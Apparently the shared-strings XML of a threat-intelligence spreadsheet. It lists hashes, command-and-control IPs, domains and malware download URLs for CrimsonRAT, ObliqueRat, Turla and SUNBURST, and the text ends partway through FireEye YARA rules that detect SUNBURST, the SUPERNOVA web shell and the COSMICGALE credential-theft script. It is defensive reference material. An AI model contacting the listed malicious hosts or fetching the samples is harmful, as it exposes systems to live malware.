    <t>CrimsonRAT SHA-256 - Backdoor.MSIL.CRIMSONRAT.YXBF4Z</t>
  </si>
  <si>
    <t>93f33e4e9a732de665510aa5fdc565fc00bcf5e28101c5cc55b5b16f94288b8a</t>
  </si>
  <si>
    <t>CrimsonRAT SHA-256</t>
  </si>
  <si>
    <t>a168f0d23858657671ade1a151551dade4ee9d1f91e42fe40b614a456681d849</t>
  </si>
  <si>
    <t>e75eb656871bff48794c06f3c34cebc6238436229cd2c8ecebde7cdebebf0e0d</t>
  </si>
  <si>
    <t>1644252028</t>
  </si>
  <si>
    <t>On port 10284 - CrimsonRAT IP Addresses</t>
  </si>
  <si>
    <t>185.136.161.124</t>
  </si>
  <si>
    <t>CrimsonRAT IP Addresses</t>
  </si>
  <si>
    <t>1644252074</t>
  </si>
  <si>
    <t>51a6ca006305c9a0e83b462b1198241e842ef98aa2b78c918c422ed48c70bf75</t>
  </si>
  <si>
    <t>AndroRAT and CapraRAT SHA-256</t>
  </si>
  <si>
    <t>83d75ff6063050305b86413d2e265b9458a9542743d357e61338107fb20a9416</t>
  </si>
  <si>
    <t>1b9cc0d92fdd6fcfa10d721300c873a9d5fb50ecea03e8a80e37f40cc0af0c22</t>
  </si>
  <si>
    <t>d62705186c488bb26fccdb1404931223a887004fd6704ac1483e599a15e92792</t>
  </si>
  <si>
    <t>83a4718fd650f78bf1aed4a5eb560950aab8bc2ea432598402c38568f7e462ab</t>
  </si>
  <si>
    <t>8304a6d1410629d7bc79b78f7f719530be0be764a4e0527bb3a3cf456ce2036a</t>
  </si>
  <si>
    <t>4ce9fee0295cbb745c37e0f1da085ef500159b5bd9e5ec8c986e9cce38882c50</t>
  </si>
  <si>
    <t>6478764346de677ed2a6f8c54daad96b6bdccb96449787c1db66a32f62175756</t>
  </si>
  <si>
    <t>c90b3f9f0b226857fa8ec270032f4f1595579e9487e87a3ecad714a1205695f4</t>
  </si>
  <si>
    <t>136cbcacf832aca13f7a9ec442079b1a504a6d3d3f720c6fec547f855ae08cea</t>
  </si>
  <si>
    <t>a78d9964db54d2430644a4cd6b2f3640f91f6aa282e5591435b4e652897aa30f</t>
  </si>
  <si>
    <t>0463363b4f3f452aaf2bee4f864f4db851e4fa803446fc3e141b772fb1d8fe48</t>
  </si>
  <si>
    <t>ba8d242b784bab8b450b34fcf7c60f1d9bfbb7dc7d98b52502f3672fbe049d68</t>
  </si>
  <si>
    <t>319140d52c310dc1642aa972586997e73c73c46a5227f7ecf176bcdaefd7266f</t>
  </si>
  <si>
    <t>22c8a08107622ec75c7d5a9d177a665cd914182cf36288270e737832b76e4012</t>
  </si>
  <si>
    <t>00f9f51505658a8d007907e234fc112034c620b0dfeaec95aa19188b6644dffd</t>
  </si>
  <si>
    <t>a0fb5419f7fb9718a721712dbd24c1edbff3b64db93fe809136dc5ff6193f13b</t>
  </si>
  <si>
    <t>09735ba9d19aa5ad79deed47008fb528ac8ae5c2a8f91f4bba35d8079059ad21</t>
  </si>
  <si>
    <t>11bc9fb270769dd57b046541a84c28821546594c9c6a7000c3917b994a592740</t>
  </si>
  <si>
    <t>dd16ed0d8ee0011042f3447f44816c8098808fd58e0eddadd644c730a1176f36</t>
  </si>
  <si>
    <t>ac7874792f81476704ca91519efb75d313b01f087a64e82c9eed7984b74e3e5f</t>
  </si>
  <si>
    <t>ed380756ba34416db2ac117791ef0e1ea0c41cfaa0966a6ecde8d92bd2763ee9</t>
  </si>
  <si>
    <t>2be3c42c1a6094764e5c4e6abfb7afdd71c935a3431094b4be8723812a064f37</t>
  </si>
  <si>
    <t>35b2f67a5e452b68bfcbbb43289fcb04e15da5efc043ff2eb1b93145c027dfe6</t>
  </si>
  <si>
    <t>a76a1771d106a83adb3bb1cc2bad1cf8a9f774d586fc764511297ed6157c44e8</t>
  </si>
  <si>
    <t>350c4b3ec14629a942d3abc4e8a711f88fbf50ea55970c8f047653c16dae581c</t>
  </si>
  <si>
    <t>bbd12bd5eaabed07f670a8fe681ec52705a45ddb7e4f9f2b304188e62d25294d</t>
  </si>
  <si>
    <t>18029be2b0bf5284713f9cf61ba5e160ae10a581f346fdd396065d5728906768</t>
  </si>
  <si>
    <t>396a46e9595fe6bdae709ab3171900ebd4fd1c6e1cd8ad94d17d2dcacb6bf6b6</t>
  </si>
  <si>
    <t>1c9024f2d696f949091be27aced113f4e98bc46c0580eb93e644a51b269c76e4</t>
  </si>
  <si>
    <t>7862eae57c6555f838fd09a5b95a31a2011b992e9a2ba49e3c6b259b1c315429</t>
  </si>
  <si>
    <t>8c867aeb8b8411e3487af4a030845d66c70a85934f460611a8637e67bbc5434a</t>
  </si>
  <si>
    <t>96102f8e48ed9c2ae8f58b005a82c1f19d30bd110d8009414974fe5d99087950</t>
  </si>
  <si>
    <t>a3c483f20a5a70ff6e7c9c8b8d0476e4d6a6ff3a77179e136169b58aedfb31be</t>
  </si>
  <si>
    <t>84c2d61e083fa5f9c8118738c4c0bebc15de31d6f9cf416f9cced7aef6aecc56</t>
  </si>
  <si>
    <t>d723869a8f5ffdc9c60539b5358ba9d284e22ee0e5007410f5844946871744c9</t>
  </si>
  <si>
    <t>d3fb855cccb4fe347d142c48266d8f5395595462c751c9a70db58efc5b0335fe</t>
  </si>
  <si>
    <t>80d6be8218cfc1545bb036a679ae28c9b3fcb34b7de980c5a255abc4fe35a453</t>
  </si>
  <si>
    <t>be91ae324b338d8cef69b3f56ed44c2447fe9dcf1da52e71e3fdfa6c77f1dea2</t>
  </si>
  <si>
    <t>0602df185fd259231d4041f7b6f8c1472f911b660f242f69b17da98e2535f5c2</t>
  </si>
  <si>
    <t>874b1ef11c72dcc18f6eca31b80dc63203aebf5416247b4c429f6a74b57ac37b</t>
  </si>
  <si>
    <t>e28059072fe6c8269c0cba48d63fa39915f6075cd25031d8bbcc1eeb1ba7226c</t>
  </si>
  <si>
    <t>f908923d7248c8639c18ade4d4b2a32d0faee2ca5c6a241593a99f656b72d5bf</t>
  </si>
  <si>
    <t>e5f23ea7a7d4d5850e25500a3d686db8598106d42f2d565e3c2cffce2daea9ab</t>
  </si>
  <si>
    <t>e54aa0d51716c129bf67df682c959362117dfd67f5bcf0b767059816e73ab7e6</t>
  </si>
  <si>
    <t>e393efe4e9566a9f9f6fb9f9b115c18297aac298bd66c426b52a1b059f89cbef</t>
  </si>
  <si>
    <t>1a425c66fb788af65d9455c8ecaab42c2b48a19b09901ba8fd9a85f93d637fa7</t>
  </si>
  <si>
    <t>065ac185eebacd9dc3b0a457eb17535d48d5ea26de6839cac2ca6a771fbcaac6</t>
  </si>
  <si>
    <t>3fa4c9531ee15d3eae49f5d13aa3308ece77be747ee00198f8cfdf46c81cbb3b</t>
  </si>
  <si>
    <t>a9309189d6b0fc07143ce2a871a85ba017750006ca6727be16329f7a3ef6da27</t>
  </si>
  <si>
    <t>b48c3cb304aac4fa4ca9aa9eb6a90463d343d6abe985a0b0beca175937f2e91c</t>
  </si>
  <si>
    <t>4a951bf2eaf75a5c3437f8255ed7707511f303984becdadcaa4151e8de0f9e90</t>
  </si>
  <si>
    <t>db54820a956615536550e4f78085f23be65bc796d0a636632c9a328a50d97e20</t>
  </si>
  <si>
    <t>8e56fb851e4bbda3005e72c4312f64a89ca1e53892b2060c452615ad3fd6b698</t>
  </si>
  <si>
    <t>c346d7cc8dbc2f06aed5821ecb5490fb258749961c4f2b4a491599146e422b93</t>
  </si>
  <si>
    <t>61afe61b5e5e7a74c00962142241caae6d4e5d44d97095b812624dae50d7f129</t>
  </si>
  <si>
    <t>1ac82cc23419b035bbbe5112409198e8b7b27be4d81337550cf3c0089370446c</t>
  </si>
  <si>
    <t>bb553e2e8bfc4bebb21552ed1068565f9609ad5dcc8fea58dc0ff1082c775df5</t>
  </si>
  <si>
    <t>6e0a12cdd778951163ccf481ffb2fc3724b382e4ca8e941b7dfdd8b0f8375cb3</t>
  </si>
  <si>
    <t>18463da5cf780724c302a26703f59a75da279cdb035650fafcea048618805681</t>
  </si>
  <si>
    <t>af9e87c3cd2f99993548a9a9cfcc0b3df7b45626448fe0065ef88595688c50d3</t>
  </si>
  <si>
    <t>2259c89d2c5e1d8324f075135b03492f393860b9911855e84f50ed6b3699ac4d</t>
  </si>
  <si>
    <t>1ca07e066880859cc6b67ba73e1dfc599751fc3ac356d43ef85520536473b384</t>
  </si>
  <si>
    <t>8153cde5c62679afc8f230dbb19d66b1724f4c4fefa68b5c92994ab42fe293de</t>
  </si>
  <si>
    <t>afc9fbb1ff8cfdd79a781bf493dc426bb059916debbb98c1b7c20a9d0f24a5f7</t>
  </si>
  <si>
    <t>7654dc94bca98e9811eff54d8fc44d1da6c6377132dded797e31e41d6f57edfa</t>
  </si>
  <si>
    <t>a707d3f235eb1a5d37bfe88e4abb9996e9c140bc32aead9a1840e152313d5412</t>
  </si>
  <si>
    <t>1743a96aad7ffb3e4ec74178c7baa2a38c683c7fb8ff319b218b8e4799c496b0</t>
  </si>
  <si>
    <t>1644252101</t>
  </si>
  <si>
    <t>0196bc9ac3db6f02cfa97323c8fce6cc7318b8f8fadb3e73bdf7971b3c541964</t>
  </si>
  <si>
    <t>ObliqueRat SHA-256</t>
  </si>
  <si>
    <t>4c37919f17fe43cfb68d5ef2291bb3f44afe5850b1ee4a2fa48834cb0ed2c997</t>
  </si>
  <si>
    <t>553502bfe265a7e75a1d2202776fd816cabccfcdb200cc180dc507f4d45668d2</t>
  </si>
  <si>
    <t>1644252124</t>
  </si>
  <si>
    <t>https://sharingmymedia.com/files/1More-details.doc</t>
  </si>
  <si>
    <t>ObliqueRat Downloader URLs </t>
  </si>
  <si>
    <t>https://sharingmymedia.com/files/Criteria-of-Army-Officers.doc</t>
  </si>
  <si>
    <t>https://sharingmymedia.com/files/7All-Selected-list.xls</t>
  </si>
  <si>
    <t>http://iiaonline.in/sasha.jpg</t>
  </si>
  <si>
    <t>http://iiaonline.in/timon.jpeg</t>
  </si>
  <si>
    <t>http://iiaonline.in/DefenceLogo/theta.bmp</t>
  </si>
  <si>
    <t>1644252151</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf</t>
  </si>
  <si>
    <t>1515427424</t>
  </si>
  <si>
    <t>1535462417</t>
  </si>
  <si>
    <t>Win32/Turla.CQ</t>
  </si>
  <si>
    <t>Recent samples</t>
  </si>
  <si>
    <t>Turla: Mosquito Whitepaper</t>
  </si>
  <si>
    <t>Win32/Turla.CP</t>
  </si>
  <si>
    <t>Win32/Turla.CR</t>
  </si>
  <si>
    <t>Win32/Turla.CS</t>
  </si>
  <si>
    <t>Win32/Turla.CT</t>
  </si>
  <si>
    <t>Win32/Turla.CU</t>
  </si>
  <si>
    <t>Win32/Turla.CV</t>
  </si>
  <si>
    <t>Win32/Turla.CW</t>
  </si>
  <si>
    <t>Win32/Turla.CX</t>
  </si>
  <si>
    <t>1515427440</t>
  </si>
  <si>
    <t>Win32/TrojanDownloader.CAM</t>
  </si>
  <si>
    <t>Older variants</t>
  </si>
  <si>
    <t>Win32/TrojanDownloader.DMU</t>
  </si>
  <si>
    <t>1515427459</t>
  </si>
  <si>
    <t>JS/Agent.NWB</t>
  </si>
  <si>
    <t>JavaScript backdoor</t>
  </si>
  <si>
    <t>JS/TrojanDownloader.Agent.REG</t>
  </si>
  <si>
    <t>1515427605</t>
  </si>
  <si>
    <t>{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}</t>
  </si>
  <si>
    <t>Hijacked CLSID</t>
  </si>
  <si>
    <t>1515427608</t>
  </si>
  <si>
    <t>{08244EE6-92F0-47F2-9FC9-929BAA2E7235}</t>
  </si>
  <si>
    <t>1515427610</t>
  </si>
  <si>
    <t>{4E14FBA2-2E22-11D1-9964-00C04FBBB345}</t>
  </si>
  <si>
    <t>1515427612</t>
  </si>
  <si>
    <t>{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
  </si>
  <si>
    <t>1515427617</t>
  </si>
  <si>
    <t>{603D3801-BD81-11D0-A3A5-00C04FD706EC}</t>
  </si>
  <si>
    <t>1515427619</t>
  </si>
  <si>
    <t>{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}</t>
  </si>
  <si>
    <t>1515427621</t>
  </si>
  <si>
    <t>{9207D8C7-E7C8-412E-87F8-2E61171BD291}</t>
  </si>
  <si>
    <t>1515427623</t>
  </si>
  <si>
    <t>{A3B3C46C-05D8-429B-BF66-87068B4CE563}</t>
  </si>
  <si>
    <t>1515427625</t>
  </si>
  <si>
    <t>{0997898B-0713-11D2-A4AA-00C04F8EEB3E}</t>
  </si>
  <si>
    <t>1515427628</t>
  </si>
  <si>
    <t>{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}</t>
  </si>
  <si>
    <t>1515427692</t>
  </si>
  <si>
    <t>http://get.adobe.com/stats/AbfFcBebD/?q=</t>
  </si>
  <si>
    <t>Fake adobe URL</t>
  </si>
  <si>
    <t>http://get.adobe.com/flashplayer/download/update/x32</t>
  </si>
  <si>
    <t>http://get.adobe.com/flashplayer/download/update/x64</t>
  </si>
  <si>
    <t>1515427828</t>
  </si>
  <si>
    <t>smallcloud.ga</t>
  </si>
  <si>
    <t>Win32 backdoor C&amp;C</t>
  </si>
  <si>
    <t>fleetwood.tk</t>
  </si>
  <si>
    <t>adstore.twilightparadox.com</t>
  </si>
  <si>
    <t>bigpen.ga</t>
  </si>
  <si>
    <t>1515427839</t>
  </si>
  <si>
    <t>https://script.google.com/macros/s/AKfycbxxPPyGP3Z5wgwbsmXDgaNcQ6DCDf63vih-Te_jKf9SMj8TkTie/exec</t>
  </si>
  <si>
    <t>JavaScript backdoor C&amp;C</t>
  </si>
  <si>
    <t>1515427845</t>
  </si>
  <si>
    <t>https://script.google.com/macros/s/AKfycbwF_VS5wHqlHmi4EQoljEtIsjmglLBO69n_2n_k2KtBqWXLk3w/exec</t>
  </si>
  <si>
    <t>ebay-global.publicvm.com</t>
  </si>
  <si>
    <t>psychology-blog.ezua.com</t>
  </si>
  <si>
    <t>agony.compress.to</t>
  </si>
  <si>
    <t>gallop.mefound.com</t>
  </si>
  <si>
    <t>auberdine.etowns.net</t>
  </si>
  <si>
    <t>skyrim.3d-game.com</t>
  </si>
  <si>
    <t>officebuild.4irc.com</t>
  </si>
  <si>
    <t>sendmessage.mooo.com</t>
  </si>
  <si>
    <t>robot.wikaba.com</t>
  </si>
  <si>
    <t>tellmemore.4irc.com</t>
  </si>
  <si>
    <t>1515427971</t>
  </si>
  <si>
    <t>https://drive.google.com/uc?authuser=0&amp;id=0B_LlMiKUOIsteEtraEJYM0QxQVE&amp;export=download</t>
  </si>
  <si>
    <t>Unofficial URLs for legitimate Flash installers</t>
  </si>
  <si>
    <t>https://drive.google.com/uc?authuser=0&amp;id=0B_LlMiKUOIstM0RRekVEbnFfaXc&amp;export=download</t>
  </si>
  <si>
    <t>filename|sha1</t>
  </si>
  <si>
    <t>1515429089</t>
  </si>
  <si>
    <t>google_update_checker.js|e012524b97fe94e96aed45b6305aa0c4f15ccc3a</t>
  </si>
  <si>
    <t>local_update_checker.js|3dc74671768eb90463c0901570c0aae24569b573</t>
  </si>
  <si>
    <t>google_update_checker.js|c51d288469df9f25e2fb7ac491918b3e579282ea</t>
  </si>
  <si>
    <t>f5abfb972495fde3d4fb3c825c3bbc437aab6c3a</t>
  </si>
  <si>
    <t>Loader (.tlb)</t>
  </si>
  <si>
    <t>bee79383bcc73cf1e8e938131179223adb39ac1d</t>
  </si>
  <si>
    <t>24925a2e8de38f2498906f8088cf2a8939e3cfd3</t>
  </si>
  <si>
    <t>Backdoor (.pdb)</t>
  </si>
  <si>
    <t>48bcec5a65401fbe9df8626a780f831ad55060a1</t>
  </si>
  <si>
    <t>e441cc1547b18bba76d2a8bd4d0f644ad5388082</t>
  </si>
  <si>
    <t>240d3473932e4d74c09fcc241cf6ec175fdce49d</t>
  </si>
  <si>
    <t>ec451f32110de398781e3edf27354e0425a51a23</t>
  </si>
  <si>
    <t>uri</t>
  </si>
  <si>
    <t>/scripts/m/query.php?id=</t>
  </si>
  <si>
    <t>Win32 backdoor C&amp;C URI</t>
  </si>
  <si>
    <t>4b5610ac5070a7d53041cc266630028d62935e3f</t>
  </si>
  <si>
    <t>Powershell backdoor installer</t>
  </si>
  <si>
    <t>e0788a0179fd3ecf7bc9e65c1c9f107d8f2c3142</t>
  </si>
  <si>
    <t>Installer</t>
  </si>
  <si>
    <t>cde4d12ef9f70988c63b66bf019c379d59a0e61f</t>
  </si>
  <si>
    <t>04fb0667b4a4eb1831be88958e6127cd7317638a</t>
  </si>
  <si>
    <t>ba3519e62618b86d10830ef256cce010014e401a</t>
  </si>
  <si>
    <t>https://github.com/eset/malware-ioc/tree/master/turla</t>
  </si>
  <si>
    <t>1607973856</t>
  </si>
  <si>
    <t>1607975098</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html</t>
  </si>
  <si>
    <t>Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor</t>
  </si>
  <si>
    <t>1607973949</t>
  </si>
  <si>
    <t>https://downloads.solarwinds.com/solarwinds/CatalogResources/Core/2019.4/2019.4.5220.20574/SolarWinds-Core-v2019.4.5220-Hotfix5.msp</t>
  </si>
  <si>
    <t>SolarWinds updates website</t>
  </si>
  <si>
    <t>1607974047</t>
  </si>
  <si>
    <t>6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com</t>
  </si>
  <si>
    <t>7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com</t>
  </si>
  <si>
    <t>gq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud.com</t>
  </si>
  <si>
    <t>ihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud.com</t>
  </si>
  <si>
    <t>k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com</t>
  </si>
  <si>
    <t>mhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud.com</t>
  </si>
  <si>
    <t>1607974083</t>
  </si>
  <si>
    <t>13.59.205.66</t>
  </si>
  <si>
    <t>54.193.127.66</t>
  </si>
  <si>
    <t>54.215.192.52</t>
  </si>
  <si>
    <t>34.203.203.23</t>
  </si>
  <si>
    <t>139.99.115.204</t>
  </si>
  <si>
    <t>5.252.177.25</t>
  </si>
  <si>
    <t>5.252.177.21</t>
  </si>
  <si>
    <t>204.188.205.176</t>
  </si>
  <si>
    <t>51.89.125.18</t>
  </si>
  <si>
    <t>167.114.213.199</t>
  </si>
  <si>
    <t>1607974149</t>
  </si>
  <si>
    <t>d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600</t>
  </si>
  <si>
    <t>53f8dfc65169ccda021b72a62e0c22a4db7c4077f002fa742717d41b3c40f2c7</t>
  </si>
  <si>
    <t>019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134</t>
  </si>
  <si>
    <t>ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6</t>
  </si>
  <si>
    <t>32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77</t>
  </si>
  <si>
    <t>292327e5c94afa352cc5a02ca273df543f2020d0e76368ff96c84f4e90778712</t>
  </si>
  <si>
    <t>c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71</t>
  </si>
  <si>
    <t>02af7cec58b9a5da1c542b5a32151ba1</t>
  </si>
  <si>
    <t>08e35543d6110ed11fdf558bb093d401</t>
  </si>
  <si>
    <t>2c4a910a1299cdae2a4e55988a2f102e</t>
  </si>
  <si>
    <t>846e27a652a5e1bfbd0ddd38a16dc865</t>
  </si>
  <si>
    <t>b91ce2fa41029f6955bff20079468448</t>
  </si>
  <si>
    <t>4f2eb62fa529c0283b28d05ddd311fae</t>
  </si>
  <si>
    <t>1607974350</t>
  </si>
  <si>
    <t>// Copyright 2020 by FireEye, Inc._x005F_x000D_
// You may not use this file except in compliance with the license. The license should have been received with this file. You may obtain a copy of the license at:_x005F_x000D_
// https://github.com/fireeye/sunburst_countermeasures/blob/main/LICENSE.txt_x005F_x000D_
import "pe"_x005F_x000D_
_x005F_x000D_
rule APT_Backdoor_SUNBURST_1_x005F_x000D_
{_x005F_x000D_
    meta:_x005F_x000D_
        author = "FireEye"_x005F_x000D_
        description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."_x005F_x000D_
    strings:_x005F_x000D_
        $cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide_x005F_x000D_
        $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }_x005F_x000D_
        $fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide_x005F_x000D_
        $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }_x005F_x000D_
        $fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide_x005F_x000D_
        $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C }_x005F_x000D_
        $fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide_x005F_x000D_
        $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }_x005F_x000D_
        $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }_x005F_x000D_
    condition:_x005F_x000D_
        $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or $fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and ($fake_orion_message_encoded and $fake_orion_message_plain) )_x005F_x000D_
}_x005F_x000D_
rule APT_Backdoor_SUNBURST_2_x005F_x000D_
{_x005F_x000D_
    meta:_x005F_x000D_
        author = "FireEye"_x005F_x000D_
        description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."_x005F_x000D_
    strings:_x005F_x000D_
        $a = "0y3Kzy8BAA==" wide_x005F_x000D_
        $aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide_x005F_x000D_
        $ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide_x005F_x000D_
        $ac = "C88sSs1JLS4GAA==" wide_x005F_x000D_
        $ad = "C/UEAA==" wide_x005F_x000D_
        $ae = "C89MSU8tKQYA" wide_x005F_x000D_
        $af = "8wvwBQA=" wide_x005F_x000D_
        $ag = "cyzIz8nJBwA=" wide_x005F_x000D_
        $ah = "c87JL03xzc/LLMkvysxLBwA=" wide_x005F_x000D_
        $ai = "88tPSS0GAA==" wide_x005F_x000D_
        $aj = "C8vPKc1NLQYA" wide_x005F_x000D_
        $ak = "88wrSS1KS0xOLQYA" wide_x005F_x000D_
        $al = "c87PLcjPS80rKQYA" wide_x005F_x000D_
        $am = "Ky7PLNAvLUjRBwA=" wide_x005F_x000D_
        $an = "06vIzQEA" wide_x005F_x000D_
        $b = "0y3NyyxLLSpOzIlPTgQA" wide_x005F_x000D_
        $c = "001OBAA=" wide_x005F_x000D_
        $d = "0y0oysxNLKqMT04EAA==" wide_x005F_x000D_
        $e = "0y3JzE0tLknMLQAA" wide_x005F_x000D_
        $f = "003PyU9KzAEA" wide_x005F_x000D_
        $h = "0y1OTS4tSk1OBAA=" wide_x005F_x000D_
        $i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide_x005F_x000D_
        $j = "c8rPSQEA" wide_x005F_x000D_
        $k = "c8rPSfEsSczJTAYA" wide_x005F_x000D_
        $l = "c60oKUp0ys9JAQA=" wide_x005F_x000D_
        $m = "c60oKUp0ys9J8SxJzMlMBgA=" wide_x005F_x000D_
        $n = "8yxJzMlMBgA=" wide_x005F_x000D_
        $o = "88lMzygBAA==" wide_x005F_x000D_
        $p = "88lMzyjxLEnMyUwGAA==" wide_x005F_x000D_
        $q = "C0pNL81JLAIA" wide_x005F_x000D_
        $r = "C07NzXTKz0kBAA==" wide_x005F_x000D_
        $s = "C07NzXTKz0nxLEnMyUwGAA==" wide_x005F_x000D_
        $t = "yy9IzStOzCsGAA==" wide_x005F_x000D_
        $u = "y8svyQcA" wide_x005F_x000D_
        $v = "SytKTU3LzysBAA==" wide_x005F_x000D_
        $w = "C84vLUpOdc5PSQ0oygcA" wide_x005F_x000D_
        $x = "C84vLUpODU4tykwLKMoHAA==" wide_x005F_x000D_
        $y = "C84vLUpO9UjMC07MKwYA" wide_x005F_x000D_
        $z = "C84vLUpO9UjMC04tykwDAA==" wide_x005F_x000D_
    condition:_x005F_x000D_
        ($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad and $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))_x005F_x000D_
}_x005F_x000D_
rule APT_Webshell_SUPERNOVA_1_x005F_x000D_
{_x005F_x000D_
    meta:_x005F_x000D_
        author = "FireEye"_x005F_x000D_
        description = "SUPERNOVA is a .NET web shell backdoor masquerading as a legitimate SolarWinds web service handler. SUPERNOVA inspects and responds to HTTP requests with the appropriate HTTP query strings, Cookies, and/or HTML form values (e.g. named codes, class, method, and args). This rule is looking for specific strings and attributes related to SUPERNOVA."_x005F_x000D_
    strings:_x005F_x000D_
        $compile1 = "CompileAssemblyFromSource"_x005F_x000D_
        $compile2 = "CreateCompiler"_x005F_x000D_
        $context = "ProcessRequest"_x005F_x000D_
        $httpmodule = "IHttpHandler" ascii_x005F_x000D_
        $string1 = "clazz"_x005F_x000D_
        $string2 = "//NetPerfMon//images//NoLogo.gif" wide_x005F_x000D_
        $string3 = "SolarWinds" ascii nocase wide_x005F_x000D_
    condition:_x005F_x000D_
        uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize &lt; 10KB and pe.imports("mscoree.dll","_CorDllMain") and $httpmodule and $context and all of ($compile*) and all of ($string*)_x005F_x000D_
}_x005F_x000D_
rule APT_Webshell_SUPERNOVA_2_x005F_x000D_
{_x005F_x000D_
    meta:_x005F_x000D_
        author = "FireEye"_x005F_x000D_
        description = "This rule is looking for specific strings related to SUPERNOVA. SUPERNOVA is a .NET web shell backdoor masquerading as a legitimate SolarWinds web service handler. SUPERNOVA inspects and responds to HTTP requests with the appropriate HTTP query strings, Cookies, and/or HTML form values (e.g. named codes, class, method, and args)."_x005F_x000D_
    strings:_x005F_x000D_
        $dynamic = "DynamicRun"_x005F_x000D_
        $solar = "Solarwinds" nocase_x005F_x000D_
        $string1 = "codes"_x005F_x000D_
        $string2 = "clazz"_x005F_x000D_
        $string3 = "method"_x005F_x000D_
        $string4 = "args"_x005F_x000D_
    condition:_x005F_x000D_
        uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize &lt; 10KB and 3 of ($string*) and $dynamic and $solar_x005F_x000D_
}_x005F_x000D_
rule APT_HackTool_PS1_COSMICGALE_1_x005F_x000D_
{_x005F_x000D_
    meta:_x005F_x000D_
        author = "FireEye"_x005F_x000D_
        description = "This rule detects various unique strings related to COSMICGALE. COSMICGALE is a credential theft and reconnaissance PowerShell script that collects credentials using the publicly available Get-PassHashes routine. COSMICGALE clears log files, writes acquired data to a hard coded path, and encrypts the file with a password."_x005F_x000D_
    strings:_x005F_x000D_
        $sr1 = /\[byte\[\]\]@\([\x09\x20]{0,32}0xaa[\x09\x20]{0,32},[\x09\x20]{0,32}0xd3[\x09\x20]{0,32},[\x09\x20]{0,32}0xb4[\x09\x20]{0,32},[\x09\x20]{0,32}0x35[\x09\x20]{0,32},/ ascii nocase wide_x005F_x000D_
        $sr2 = /\[bitconverter\]::toint32\(\$\w{1,64}\[0x0c..0x0f\][\x09\x20]{0,32},[\x09\x20]{0,32}0\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}0xcc\x3b/ ascii nocase wide_x005F_x000D_
        $sr3 = /\[byte\[\]\]\(\$\w{1,64}\.padright\(\d{1,2}\)\.substring\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,2}\)\.tochararray\(\)\)/ ascii nocase wide_x005F_x000D_
        $ss1 = "[text.encoding]::ascii.getbytes(\"ntpassword\x600\");" ascii nocase wide_x005F_x000D_
